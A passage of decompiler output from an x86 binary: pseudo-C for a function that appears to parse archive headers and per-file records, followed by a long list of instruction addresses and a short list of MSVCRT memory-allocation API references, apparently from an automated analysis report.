																		} else {
																			switch( *((intOrPtr*)(_t561 * 4 +  &M0041ADD2))) {
																				case 0:
																					__eax =  &_a60;
																					__ecx = __esi;
																					__eax = E00419845(__esi, __edx, _a108,  &_a60);
																					__eax = 0;
																					_a124 = __edi;
																					__eflags = _a64 - __edi;
																					if(__eflags > 0) {
																						do {
																							__ecx = _a60;
																							__eflags =  *((char*)(__ecx + __eax));
																							if( *((char*)(__ecx + __eax)) != 0) {
																								_t244 =  &_a124;
																								 *_t244 = _a124 + 1;
																								__eflags =  *_t244;
																							}
																							__eax = __eax + 1;
																							__eflags = __eax - _a64;
																						} while (__eflags < 0);
																					}
																					__edi = _a124;
																					 &_a24 = E00419725( &_a24, __edi, __eflags);
																					 &_a48 = E00419725( &_a48, __edi, __eflags);
																					goto L54;
																				case 1:
																					__eax =  &_a24;
																					goto L67;
																				case 2:
																					__eax =  &_a48;
																					L67:
																					__ecx = __esi;
																					__eax = E00419845(__ecx, __edx, _a124, __eax);
																					goto L54;
																				case 3:
																					_v16 = _t739;
																					E00419747( &_v20, _t722, _t758, __eflags, _t749,  &_a72);
																					_t739 =  *((intOrPtr*)( *((intOrPtr*)(_t749 + 0x38)) + 4)) -  *((intOrPtr*)( *((intOrPtr*)(_t749 + 0x38)) + 8));
																					E0040BBD0(_t613 + 0xd0, _t739);
																					E00418E93( *((intOrPtr*)(_t749 + 0x38)),  *((intOrPtr*)(_t613 + 0xd0)), _t739);
																					E0041911E(_t613 + 0xd8, __eflags,  *(_t613 + 0x5c) + 1);
																					_t722 = 0;
																					_t570 = 0;
																					_a116 = 0;
																					_a112 = 0;
																					__eflags =  *(_t613 + 0x5c);
																					if( *(_t613 + 0x5c) <= 0) {
																						L51:
																						_t722 = _t722 >> 1;
																						 *( *((intOrPtr*)(_t613 + 0xd8)) + _t570 * 4) = _t722;
																						__eflags = _a116 - _t739;
																						if(_a116 != _t739) {
																							 *((char*)(_t749 + 0x3c)) = 1;
																						}
																						E00418E1D( &_v20);
																						goto L54;
																					} else {
																						do {
																							_a120 = _a120 & 0x00000000;
																							_t574 =  *((intOrPtr*)(_t613 + 0xd0)) + _t722;
																							_t650 = _t739 - _t722 >> 1;
																							__eflags = _t650;
																							if(_t650 != 0) {
																								while(1) {
																									_t722 = _a120;
																									__eflags =  *((short*)(_t574 + _t722 * 2));
																									if( *((short*)(_t574 + _t722 * 2)) == 0) {
																										goto L49;
																									}
																									_a120 = _a120 + 1;
																									__eflags = _a120 - _t650;
																									if(_a120 < _t650) {
																										continue;
																									}
																									goto L49;
																								}
																							}
																							L49:
																							__eflags = _a120 - _t650;
																							if(_a120 == _t650) {
																								goto L106;
																							} else {
																								goto L50;
																							}
																							goto L149;
																							L50:
																							_t575 = _a112;
																							 *( *((intOrPtr*)(_t613 + 0xd8)) + _t575 * 4) = _a116 >> 1;
																							_t570 = _t575 + 1;
																							_t722 = _a116 + 2 + _a120 * 2;
																							_a116 = _t722;
																							_a112 = _t570;
																							__eflags = _t570 -  *(_t613 + 0x5c);
																						} while (_t570 <  *(_t613 + 0x5c));
																						goto L51;
																					}
																					goto L149;
																				case 4:
																					__eax = __ebx + 0x64;
																					goto L70;
																				case 5:
																					__eax = __ebx + 0x7c;
																					goto L70;
																				case 6:
																					__eax = __ebx + 0x94;
																					goto L70;
																				case 7:
																					__eax =  &_v12;
																					__ecx = __esi;
																					_v12 = __edi;
																					_v8 = __edi;
																					_v4 = __edi;
																					E00419893(__esi, __edx, __edi, __ebp, __eflags,  *((intOrPtr*)(__ebx + 0x5c)),  &_v12) =  &_a72;
																					__ecx =  &_a8;
																					_a12 = __di;
																					__eax = E00419747( &_a8, __edx, __ebp, __eflags, __esi,  &_a72);
																					_a120 = __edi;
																					__eflags = _a108 - __edi;
																					if(_a108 > __edi) {
																						_a116 = __edi;
																						do {
																							__edi =  *(__ebx + 0x58);
																							__eax = _v12;
																							__ecx = _a120;
																							__edi =  *(__ebx + 0x58) + _a116;
																							__al =  *((intOrPtr*)(_v12 + _a120));
																							 *((char*)(__edi + 0x13)) = __al;
																							__eflags = __al;
																							if(__al != 0) {
																								__ecx =  *((intOrPtr*)(__esi + 0x38));
																								 *((intOrPtr*)(__edi + 8)) = E00418FFB( *((intOrPtr*)(__esi + 0x38)));
																							}
																							_a120 = _a120 + 1;
																							__eax = _a120;
																							_a116 = _a116 + 0x18;
																							__eflags = _a120 - _a108;
																						} while (_a120 < _a108);
																					}
																					__ecx =  &_a8;
																					__eax = E00418E1D( &_a8);
																					_push(_v12);
																					L0041C160();
																					_pop(__ecx);
																					goto L54;
																				case 8:
																					goto L83;
																				case 9:
																					__eax = __ebx + 0xac;
																					L70:
																					__ecx = __esi;
																					 &_a72 = E004198DE(__ecx, __edx, __eflags,  &_a72,  &_a72, _a108);
																					L54:
																					E00419652(_t613 + 0x108, _t722, _a92, _a96);
																					goto L84;
																				case 0xa:
																					_a16 = __edi;
																					__eflags = _a88 - __edi;
																					if(__eflags >= 0) {
																						if(__eflags > 0) {
																							L77:
																							__ecx =  *((intOrPtr*)(__esi + 0x38));
																							__eax = E00418E7C(__ecx, __edi);
																							__eflags = __al;
																							if(__al != 0) {
																								 *((char*)(__esi + 0x3c)) = 1;
																							}
																							_a16 = _a16 + 1;
																							asm("adc edi, 0x0");
																							__eflags = __edi - _a88;
																						} else {
																							__eflags = _a84 - __edi;
																							if(_a84 > __edi) {
																								goto L77;
																								do {
																									do {
																										goto L77;
																									} while (__eflags < 0);
																									if(__eflags <= 0) {
																										goto L81;
																									}
																									goto L84;
																									L81:
																									__eax = _a84;
																									__eflags = _a16 - _a84;
																								} while (_a16 < _a84);
																							}
																						}
																					}
																					L84:
																					_t650 =  *((intOrPtr*)( *((intOrPtr*)(_t749 + 0x38)) + 4)) -  *((intOrPtr*)( *((intOrPtr*)(_t749 + 0x38)) + 8));
																					__eflags = _t650;
																					if(_t650 != 0) {
																						goto L106;
																					} else {
																						E00418E1D(_t758);
																						goto L86;
																					}
																					goto L149;
																			}
																		}
																	} else {
																		__eflags = _a92 - 0x40000000;
																		if(_a92 > 0x40000000) {
																			goto L83;
																		} else {
																			goto L43;
																		}
																	}
																}
															} else {
																__eflags = _a84 - _t650;
																if(_a84 > _t650) {
																	goto L106;
																} else {
																	goto L40;
																}
															}
														}
														goto L149;
													}
													E00418FB1(_t648);
													__eflags = _a108 - _a124 - _a40;
													if(_a108 - _a124 != _a40) {
														E00418E04(_t648);
													}
													_t703 = _a48;
													_t742 = 0;
													_t579 = 0;
													_a116 = 0;
													__eflags = _a124;
													if(_a124 > 0) {
														do {
															__eflags =  *((char*)(_t703 + _t579));
															if( *((char*)(_t703 + _t579)) != 0) {
																_t287 =  &_a116;
																 *_t287 = _a116 + 1;
																__eflags =  *_t287;
															}
															_t579 = _t579 + 1;
															__eflags = _t579 - _a124;
														} while (_t579 < _a124);
													}
													_a120 = _t742;
													__eflags = _a108 - _t742;
													if(__eflags > 0) {
														_t581 = _a24 - _t703;
														__eflags = _t581;
														_a112 = _t703;
														_a124 = _t742;
														_a88 = _t581;
														do {
															_t755 =  *((intOrPtr*)(_t613 + 0x58)) + _a124;
															_t582 = _a60;
															__eflags =  *((char*)(_t582 + _a120));
															_t583 = _t582 & 0xffffff00 |  *((char*)(_t582 + _a120)) == 0x00000000;
															 *(_t755 + 0x10) = _t583;
															 *((intOrPtr*)(_t755 + 0xc)) = 0;
															__eflags = _t583;
															if(_t583 == 0) {
																_t584 = _a112;
																_t731 = _a88;
																__eflags =  *(_t731 + _t584);
																 *((char*)(_t755 + 0x11)) = _t731 & 0xffffff00 |  *(_t731 + _t584) == 0x00000000;
																_t722 =  *_t584;
																_t585 = _t584 + 1;
																__eflags = _t585;
																_a96 =  *_t584;
																_a112 = _t585;
																 *_t755 = 0;
																 *((intOrPtr*)(_t755 + 4)) = 0;
																 *((char*)(_t755 + 0x12)) = 0;
															} else {
																_t588 = _a36;
																 *((char*)(_t755 + 0x11)) = 0;
																_a96 = 0;
																 *_t755 =  *((intOrPtr*)(_t588 + _t742 * 8));
																 *((intOrPtr*)(_t755 + 4)) =  *((intOrPtr*)(_t588 + 4 + _t742 * 8));
																_t590 = E004192B9( &_v44, _t742);
																 *((char*)(_t755 + 0x12)) = _t590;
																__eflags = _t590;
																if(_t590 != 0) {
																	 *((intOrPtr*)(_t755 + 0xc)) =  *((intOrPtr*)(_v32 + _t742 * 4));
																}
																_t742 = _t742 + 1;
															}
															__eflags = _a116;
															if(_a116 != 0) {
																E0041967B(_t613 + 0xc4, _a96);
															}
															_a120 = _a120 + 1;
															_a124 = _a124 + 0x18;
															__eflags = _a120 - _a108;
														} while (__eflags < 0);
													}
													_push(_a48);
													L0041C160();
													_push(_a24);
													L0041C160();
													_push(_a60);
													L0041C160();
													_t765 = _t765 + 0xc;
												}
												goto L104;
											}
										} else {
											__eflags = _t722 - _t737;
											if(__eflags != 0) {
												goto L28;
											} else {
												_push(_a124);
												_push(_a120);
												_t745 = _t613 + 0x100;
												_push(_a116);
												_t602 = E0041A63E(_t749, _t722, __eflags,  *((intOrPtr*)(_t613 + 0xf0)),  *((intOrPtr*)(_t613 + 0xf4)), _t745,  &_a72, _a112);
												_a108 = _t602;
												__eflags = _t602;
												if(_t602 == 0) {
													 *_t745 =  *_t745 +  *((intOrPtr*)(_t613 + 0xf0));
													asm("adc [edi+0x4], eax");
													_t498 = E00418FB1( *((intOrPtr*)(_t749 + 0x38)));
													_t737 = 0;
													__eflags = 0;
													goto L28;
												} else {
													E0041969C( &_a72);
													_t501 = _a108;
													L105:
													__eflags =  &_a100;
													return _t501;
												}
											}
										}
									} else {
										goto L14;
									}
								}
							}
						}
						goto L149;
					}
					E00418E04(_t625);
					goto L17;
				} else {
					L1:
					 *((intOrPtr*)(_t734 + 0x70)) =  *((intOrPtr*)(_t734 + 0x70)) +  *((intOrPtr*)(_v44 + _v52 * 8));
					asm("adc [edi+0x74], eax");
					E00417CCA( &_v148);
					_push(_a48);
					L0041C160();
					_push(_a36);
					L0041C160();
					_push(_a60);
					L0041C160();
					E004185D1( &_v52);
					_t479 = 0;
					L2:
					return _t479;
				}
				L149:
			}





























































































                                          0x0041a63e
                                          0x0041a63f
                                          0x0041a643
                                          0x0041a64a
                                          0x0041a64c
                                          0x0041a651
                                          0x0041a654
                                          0x0041a66d
                                          0x0041a670
                                          0x0041a673
                                          0x0041a676
                                          0x0041a679
                                          0x0041a67c
                                          0x0041a67f
                                          0x0041a682
                                          0x0041a685
                                          0x0041a688
                                          0x0041a698
                                          0x0041a69d
                                          0x0041a69f
                                          0x0041a6a5
                                          0x0041a6f7
                                          0x0041a702
                                          0x0041a70c
                                          0x0041a70f
                                          0x0041a712
                                          0x0041a715
                                          0x0041a719
                                          0x0041a71b
                                          0x00000000
                                          0x00000000
                                          0x0041a721
                                          0x0041a723
                                          0x00000000
                                          0x0041a729
                                          0x0041a72d
                                          0x0041a732
                                          0x0041a734
                                          0x0041a73a
                                          0x0041a73c
                                          0x0041a74b
                                          0x0041a74b
                                          0x0041a73e
                                          0x0041a73e
                                          0x0041a741
                                          0x0041a747
                                          0x0041a747
                                          0x0041a74d
                                          0x0041a74f
                                          0x0041a754
                                          0x0041a754
                                          0x0041a76b
                                          0x0041a778
                                          0x0041a77f
                                          0x0041a78a
                                          0x0041a798
                                          0x0041a79d
                                          0x0041a7a0
                                          0x0041a7a2
                                          0x0041a7f4
                                          0x0041a7f7
                                          0x0041a800
                                          0x0041a805
                                          0x0041a808
                                          0x0041a80d
                                          0x0041a810
                                          0x0041a815
                                          0x0041a818
                                          0x0041a823
                                          0x0041a828
                                          0x00000000
                                          0x0041a7a4
                                          0x0041a7aa
                                          0x0041a7af
                                          0x0041a7b1
                                          0x0041a7d2
                                          0x0041a7d5
                                          0x0041a7d8
                                          0x0041a7db
                                          0x0041a7de
                                          0x0041a7e1
                                          0x0041a6f4
                                          0x00000000
                                          0x0041a7e7
                                          0x0041a7e7
                                          0x00000000
                                          0x0041a7e7
                                          0x0041a7b3
                                          0x0041a7c1
                                          0x0041a7c3
                                          0x0041a7c6
                                          0x0041a7cb
                                          0x0041a7ce
                                          0x0041a7d0
                                          0x0041a830
                                          0x0041a835
                                          0x0041a836
                                          0x0041a837
                                          0x0041a83b
                                          0x0041a841
                                          0x0041a842
                                          0x0041a843
                                          0x0041a848
                                          0x0041a849
                                          0x0041a84e
                                          0x0041a851
                                          0x0041a854
                                          0x0041a874
                                          0x0041a874
                                          0x0041a856
                                          0x0041a856
                                          0x0041a858
                                          0x0041a85a
                                          0x0041a865
                                          0x0041a86d
                                          0x0041a86d
                                          0x0041a85a
                                          0x0041a876
                                          0x0041a879
                                          0x0041a87c
                                          0x0041a87f
                                          0x0041a882
                                          0x0041a8e4
                                          0x0041a8e4
                                          0x0041a8e7
                                          0x0041a8ea
                                          0x0041a8ed
                                          0x0041a8f0
                                          0x0041a8f3
                                          0x0041a8f6
                                          0x0041a8f9
                                          0x0041a8fc
                                          0x0041a8ff
                                          0x0041a902
                                          0x0041a904
                                          0x0041a906
                                          0x0041a911
                                          0x0041a91e
                                          0x0041a929
                                          0x0041a931
                                          0x0041a937
                                          0x0041a93c
                                          0x0041a93c
                                          0x0041a93c
                                          0x0041a906
                                          0x0041a93e
                                          0x0041a941
                                          0x0041a944
                                          0x0041ad95
                                          0x0041ad97
                                          0x0041ad9c
                                          0x0041ad9f
                                          0x0041ada4
                                          0x0041ada7
                                          0x0041adac
                                          0x0041adaf
                                          0x0041adba
                                          0x0041adbf
                                          0x0041adbf
                                          0x00000000
                                          0x0041a94a
                                          0x0041a94a
                                          0x0041a94c
                                          0x0041a95e
                                          0x0041a961
                                          0x0041a972
                                          0x0041a975
                                          0x0041a983
                                          0x0041a988
                                          0x0041a98b
                                          0x0041a98d
                                          0x0041a990
                                          0x0041a99b
                                          0x0041a99b
                                          0x0041a990
                                          0x0041a9a0
                                          0x0041a9a5
                                          0x0041a9a8
                                          0x0041a9ab
                                          0x0041a9b1
                                          0x0041a9b8
                                          0x0041a9bb
                                          0x0041a9be
                                          0x0041a9c1
                                          0x0041a9c4
                                          0x0041a9c7
                                          0x0041a9ca
                                          0x0041ac7d
                                          0x0041ac7d
                                          0x0041ac80
                                          0x0041ac85
                                          0x0041ac88
                                          0x0041ac8b
                                          0x0041ac8d
                                          0x0041ac90
                                          0x00000000
                                          0x00000000
                                          0x0041a9d7
                                          0x0041a9da
                                          0x0041a9e0
                                          0x0041a9e3
                                          0x0041a9e6
                                          0x0041a9e8
                                          0x0041a9eb
                                          0x0041adcb
                                          0x0041adcb
                                          0x0041add2
                                          0x0041add3
                                          0x0041add7
                                          0x0041add8
                                          0x0041add9
                                          0x0041addb
                                          0x0041addc
                                          0x0041addd
                                          0x0041ade1
                                          0x0041ade7
                                          0x0041ade9
                                          0x0041adeb
                                          0x0041aded
                                          0x0041adef
                                          0x0041adf1
                                          0x0041adf5
                                          0x0041adf9
                                          0x0041adfb
                                          0x0041adfd
                                          0x0041adff
                                          0x0041ae00
                                          0x0041ae01
                                          0x0041ae01
                                          0x0041ae01
                                          0x0041ae02
                                          0x0041ae08
                                          0x0041ae09
                                          0x0041ae0a
                                          0x0041ae0b
                                          0x0041ae0e
                                          0x0041ae12
                                          0x0041ae1a
                                          0x0041ae23
                                          0x0041ae2c
                                          0x0041ae35
                                          0x0041ae37
                                          0x0041ae3d
                                          0x0041ae43
                                          0x0041af36
                                          0x0041af36
                                          0x0041af36
                                          0x00000000
                                          0x0041ae49
                                          0x0041ae4f
                                          0x0041ae52
                                          0x0041ae58
                                          0x0041ae5e
                                          0x0041ae64
                                          0x0041ae6d
                                          0x0041ae6f
                                          0x0041ae72
                                          0x0041ae78
                                          0x0041ae7e
                                          0x0041ae88
                                          0x0041ae8e
                                          0x0041ae94
                                          0x0041ae97
                                          0x00000000
                                          0x0041ae9d
                                          0x0041ae9d
                                          0x0041aea7
                                          0x0041aea7
                                          0x0041aeae
                                          0x00000000
                                          0x0041aeb4
                                          0x0041aeb4
                                          0x0041aebb
                                          0x0041aebe
                                          0x0041aebe
                                          0x0041aec1
                                          0x0041aed1
                                          0x0041aed7
                                          0x0041aed9
                                          0x0041aed9
                                          0x0041aee9
                                          0x0041aeeb
                                          0x0041aef1
                                          0x0041aef4
                                          0x0041aef6
                                          0x0041aef9
                                          0x0041aefc
                                          0x0041af04
                                          0x0041af06
                                          0x0041af0c
                                          0x0041af15
                                          0x0041af1e
                                          0x0041af24
                                          0x0041af26
                                          0x0041af40
                                          0x0041af40
                                          0x0041af4e
                                          0x0041af51
                                          0x0041af53
                                          0x0041af55
                                          0x0041af58
                                          0x0041af5a
                                          0x0041af61
                                          0x0041af61
                                          0x0041af5c
                                          0x0041af5c
                                          0x0041af5f
                                          0x0041af68
                                          0x0041af6b
                                          0x0041af78
                                          0x0041af7b
                                          0x0041af80
                                          0x0041af82
                                          0x0041af93
                                          0x0041af96
                                          0x0041af99
                                          0x0041af9e
                                          0x0041afa1
                                          0x0041afa3
                                          0x0041afa3
                                          0x0041afa3
                                          0x0041afa8
                                          0x0041afae
                                          0x0041afb0
                                          0x0041afb0
                                          0x0041afb7
                                          0x0041afc1
                                          0x0041afc6
                                          0x0041afcb
                                          0x0041afce
                                          0x0041afd1
                                          0x0041afd4
                                          0x0041afd7
                                          0x0041afdc
                                          0x0041afdf
                                          0x0041afe9
                                          0x0041afe9
                                          0x0041afec
                                          0x00000000
                                          0x0041afee
                                          0x0041afee
                                          0x0041aff0
                                          0x00000000
                                          0x0041aff2
                                          0x0041aff2
                                          0x0041aff8
                                          0x0041affb
                                          0x0041affd
                                          0x0041b017
                                          0x0041b01c
                                          0x0041b01f
                                          0x0041b021
                                          0x0041b03b
                                          0x0041b03e
                                          0x0041b055
                                          0x0041b059
                                          0x00000000
                                          0x0041b05f
                                          0x0041b062
                                          0x0041b070
                                          0x0041b075
                                          0x0041b078
                                          0x0041b07d
                                          0x0041b080
                                          0x00000000
                                          0x0041b086
                                          0x0041b086
                                          0x0041b088
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041b088
                                          0x0041b080
                                          0x0041b040
                                          0x0041b043
                                          0x0041b04b
                                          0x00000000
                                          0x0041b04b
                                          0x0041b023
                                          0x0041b026
                                          0x0041b02e
                                          0x0041b033
                                          0x00000000
                                          0x0041b033
                                          0x0041b021
                                          0x0041aff0
                                          0x0041afe1
                                          0x0041afe1
                                          0x0041afe3
                                          0x0041b08e
                                          0x0041b08e
                                          0x0041b091
                                          0x0041b098
                                          0x0041b09e
                                          0x0041b0a1
                                          0x0041b0a7
                                          0x0041b0aa
                                          0x0041b0ad
                                          0x0041b0b0
                                          0x0041b0b6
                                          0x0041b0c0
                                          0x0041b0c8
                                          0x0041b0cd
                                          0x0041b0d0
                                          0x0041b0d6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041afe3
                                          0x0041af84
                                          0x0041af84
                                          0x0041af86
                                          0x0041af86
                                          0x0041af89
                                          0x0041af8f
                                          0x0041af8f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041af5f
                                          0x0041af5a
                                          0x0041af28
                                          0x0041af28
                                          0x0041af2f
                                          0x0041af2f
                                          0x00000000
                                          0x0041af2a
                                          0x0041af2a
                                          0x0041af2d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041af2d
                                          0x0041af28
                                          0x0041aec3
                                          0x0041aec3
                                          0x0041aec6
                                          0x0041af38
                                          0x0041af38
                                          0x0041af38
                                          0x0041aec8
                                          0x0041aec8
                                          0x0041aec8
                                          0x0041aec6
                                          0x0041aeb6
                                          0x0041aeb6
                                          0x0041aeb9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041aeb9
                                          0x0041aeb4
                                          0x0041ae9f
                                          0x0041ae9f
                                          0x0041aea1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041aea1
                                          0x0041ae9d
                                          0x0041ae97
                                          0x0041af3d
                                          0x0041a9f1
                                          0x0041a9f1
                                          0x0041a9fc
                                          0x0041aa01
                                          0x0041aa06
                                          0x0041aa0f
                                          0x0041aa14
                                          0x0041aa16
                                          0x0041aa19
                                          0x0041ac56
                                          0x0041ac56
                                          0x0041ac63
                                          0x00000000
                                          0x0041aa1f
                                          0x0041aa1f
                                          0x0041aa2e
                                          0x0041aa31
                                          0x0041aa34
                                          0x0041aa37
                                          0x00000000
                                          0x0041aa3d
                                          0x0041aa3d
                                          0x00000000
                                          0x0041ab99
                                          0x0041aba0
                                          0x0041aba2
                                          0x0041aba7
                                          0x0041aba9
                                          0x0041abac
                                          0x0041abaf
                                          0x0041abb1
                                          0x0041abb1
                                          0x0041abb4
                                          0x0041abb8
                                          0x0041abba
                                          0x0041abba
                                          0x0041abba
                                          0x0041abba
                                          0x0041abbd
                                          0x0041abbe
                                          0x0041abbe
                                          0x0041abb1
                                          0x0041abc3
                                          0x0041abc9
                                          0x0041abd1
                                          0x00000000
                                          0x00000000
                                          0x0041abdb
                                          0x00000000
                                          0x00000000
                                          0x0041abee
                                          0x0041abde
                                          0x0041abe2
                                          0x0041abe4
                                          0x00000000
                                          0x00000000
                                          0x0041aa4c
                                          0x0041aa50
                                          0x0041aa5b
                                          0x0041aa65
                                          0x0041aa74
                                          0x0041aa84
                                          0x0041aa89
                                          0x0041aa8b
                                          0x0041aa8d
                                          0x0041aa90
                                          0x0041aa93
                                          0x0041aa96
                                          0x0041aaee
                                          0x0041aaf4
                                          0x0041aaf6
                                          0x0041aaf9
                                          0x0041aafc
                                          0x0041aafe
                                          0x0041aafe
                                          0x0041ab05
                                          0x00000000
                                          0x0041aa98
                                          0x0041aa98
                                          0x0041aa9e
                                          0x0041aaa6
                                          0x0041aaa8
                                          0x0041aaa8
                                          0x0041aaaa
                                          0x0041aaac
                                          0x0041aaac
                                          0x0041aaaf
                                          0x0041aab4
                                          0x00000000
                                          0x00000000
                                          0x0041aab6
                                          0x0041aab9
                                          0x0041aabc
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041aabc
                                          0x0041aaac
                                          0x0041aabe
                                          0x0041aabe
                                          0x0041aac1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041aac7
                                          0x0041aaca
                                          0x0041aad5
                                          0x0041aade
                                          0x0041aadf
                                          0x0041aae3
                                          0x0041aae6
                                          0x0041aae9
                                          0x0041aae9
                                          0x00000000
                                          0x0041aa98
                                          0x00000000
                                          0x00000000
                                          0x0041ac0d
                                          0x00000000
                                          0x00000000
                                          0x0041ac12
                                          0x00000000
                                          0x00000000
                                          0x0041ac17
                                          0x00000000
                                          0x00000000
                                          0x0041ab20
                                          0x0041ab27
                                          0x0041ab29
                                          0x0041ab2c
                                          0x0041ab2f
                                          0x0041ab37
                                          0x0041ab3c
                                          0x0041ab3f
                                          0x0041ab43
                                          0x0041ab48
                                          0x0041ab4b
                                          0x0041ab4e
                                          0x0041ab50
                                          0x0041ab53
                                          0x0041ab53
                                          0x0041ab56
                                          0x0041ab59
                                          0x0041ab5c
                                          0x0041ab5f
                                          0x0041ab62
                                          0x0041ab65
                                          0x0041ab67
                                          0x0041ab69
                                          0x0041ab71
                                          0x0041ab71
                                          0x0041ab74
                                          0x0041ab77
                                          0x0041ab7a
                                          0x0041ab7e
                                          0x0041ab7e
                                          0x0041ab53
                                          0x0041ab83
                                          0x0041ab86
                                          0x0041ab8b
                                          0x0041ab8e
                                          0x0041ab93
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041abf3
                                          0x0041abf9
                                          0x0041abfc
                                          0x0041ac03
                                          0x0041ab0a
                                          0x0041ab16
                                          0x00000000
                                          0x00000000
                                          0x0041ac1f
                                          0x0041ac22
                                          0x0041ac25
                                          0x0041ac27
                                          0x0041ac2e
                                          0x0041ac2e
                                          0x0041ac31
                                          0x0041ac36
                                          0x0041ac38
                                          0x0041ac3a
                                          0x0041ac3a
                                          0x0041ac3e
                                          0x0041ac42
                                          0x0041ac45
                                          0x0041ac29
                                          0x0041ac29
                                          0x0041ac2c
                                          0x00000000
                                          0x0041ac2e
                                          0x0041ac2e
                                          0x00000000
                                          0x00000000
                                          0x0041ac4a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041ac4c
                                          0x0041ac4c
                                          0x0041ac4f
                                          0x0041ac4f
                                          0x0041ac54
                                          0x0041ac2c
                                          0x0041ac27
                                          0x0041ac66
                                          0x0041ac6c
                                          0x0041ac6c
                                          0x0041ac6f
                                          0x00000000
                                          0x0041ac75
                                          0x0041ac78
                                          0x00000000
                                          0x0041ac78
                                          0x00000000
                                          0x00000000
                                          0x0041aa3d
                                          0x0041aa21
                                          0x0041aa21
                                          0x0041aa28
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041aa28
                                          0x0041aa1f
                                          0x0041a9f3
                                          0x0041a9f3
                                          0x0041a9f6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041a9f6
                                          0x0041a9f1
                                          0x00000000
                                          0x0041a9eb
                                          0x0041ac96
                                          0x0041aca1
                                          0x0041aca4
                                          0x0041aca6
                                          0x0041aca6
                                          0x0041acab
                                          0x0041acae
                                          0x0041acb0
                                          0x0041acb2
                                          0x0041acb5
                                          0x0041acb8
                                          0x0041acba
                                          0x0041acba
                                          0x0041acbe
                                          0x0041acc0
                                          0x0041acc0
                                          0x0041acc0
                                          0x0041acc0
                                          0x0041acc3
                                          0x0041acc4
                                          0x0041acc4
                                          0x0041acba
                                          0x0041acc9
                                          0x0041accc
                                          0x0041accf
                                          0x0041acd8
                                          0x0041acd8
                                          0x0041acda
                                          0x0041acdd
                                          0x0041ace0
                                          0x0041ace3
                                          0x0041ace6
                                          0x0041ace9
                                          0x0041acef
                                          0x0041acf3
                                          0x0041acf8
                                          0x0041acfb
                                          0x0041acfe
                                          0x0041ad00
                                          0x0041ad33
                                          0x0041ad36
                                          0x0041ad39
                                          0x0041ad3f
                                          0x0041ad42
                                          0x0041ad44
                                          0x0041ad44
                                          0x0041ad45
                                          0x0041ad48
                                          0x0041ad4b
                                          0x0041ad4d
                                          0x0041ad50
                                          0x0041ad02
                                          0x0041ad02
                                          0x0041ad05
                                          0x0041ad08
                                          0x0041ad0e
                                          0x0041ad18
                                          0x0041ad1b
                                          0x0041ad20
                                          0x0041ad23
                                          0x0041ad25
                                          0x0041ad2d
                                          0x0041ad2d
                                          0x0041ad30
                                          0x0041ad30
                                          0x0041ad53
                                          0x0041ad57
                                          0x0041ad62
                                          0x0041ad62
                                          0x0041ad67
                                          0x0041ad6d
                                          0x0041ad71
                                          0x0041ad71
                                          0x0041ace3
                                          0x0041ad7a
                                          0x0041ad7d
                                          0x0041ad82
                                          0x0041ad85
                                          0x0041ad8a
                                          0x0041ad8d
                                          0x0041ad92
                                          0x0041ad92
                                          0x00000000
                                          0x0041a94c
                                          0x0041a884
                                          0x0041a884
                                          0x0041a886
                                          0x00000000
                                          0x0041a888
                                          0x0041a888
                                          0x0041a88e
                                          0x0041a891
                                          0x0041a897
                                          0x0041a8ad
                                          0x0041a8b2
                                          0x0041a8b5
                                          0x0041a8b7
                                          0x0041a8cf
                                          0x0041a8d7
                                          0x0041a8dd
                                          0x0041a8e2
                                          0x0041a8e2
                                          0x00000000
                                          0x0041a8b9
                                          0x0041a8bc
                                          0x0041a8c1
                                          0x0041adc1
                                          0x0041adc4
                                          0x0041adc8
                                          0x0041adc8
                                          0x0041a8b7
                                          0x0041a886
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041a7d0
                                          0x0041a7b1
                                          0x0041a7a2
                                          0x00000000
                                          0x0041a723
                                          0x0041a7ef
                                          0x00000000
                                          0x0041a6a7
                                          0x0041a6a7
                                          0x0041a6b0
                                          0x0041a6bd
                                          0x0041a6c0
                                          0x0041a6c5
                                          0x0041a6c8
                                          0x0041a6cd
                                          0x0041a6d0
                                          0x0041a6d5
                                          0x0041a6d8
                                          0x0041a6e3
                                          0x0041a6e8
                                          0x0041a6ea
                                          0x0041a6f1
                                          0x0041a6f1
                                          0x00000000

                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041A6C8
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041A6D0
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041A6D8
                                            • Part of subcall function 004185D1: ??3@YAXPAX@Z.MSVCRT ref: 004185D7
                                            • Part of subcall function 004185D1: ??3@YAXPAX@Z.MSVCRT ref: 004185DF
                                            • Part of subcall function 004185D1: ??3@YAXPAX@Z.MSVCRT ref: 004185E7
                                            • Part of subcall function 004185D1: ??3@YAXPAX@Z.MSVCRT ref: 004185EF
                                            • Part of subcall function 004185D1: ??3@YAXPAX@Z.MSVCRT ref: 004185F7
                                            • Part of subcall function 004185D1: ??3@YAXPAX@Z.MSVCRT ref: 004185FF
                                            • Part of subcall function 004185D1: ??3@YAXPAX@Z.MSVCRT ref: 00418607
                                            • Part of subcall function 004185D1: ??3@YAXPAX@Z.MSVCRT ref: 0041860F
                                            • Part of subcall function 004185D1: ??3@YAXPAX@Z.MSVCRT ref: 00418617
                                            • Part of subcall function 004185D1: ??3@YAXPAX@Z.MSVCRT ref: 0041861F
                                            • Part of subcall function 004185D1: ??3@YAXPAX@Z.MSVCRT ref: 00418627
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0041A734
                                            • Part of subcall function 00417CCA: ??3@YAXPAX@Z.MSVCRT ref: 00417CDD
                                          Memory Dump Source
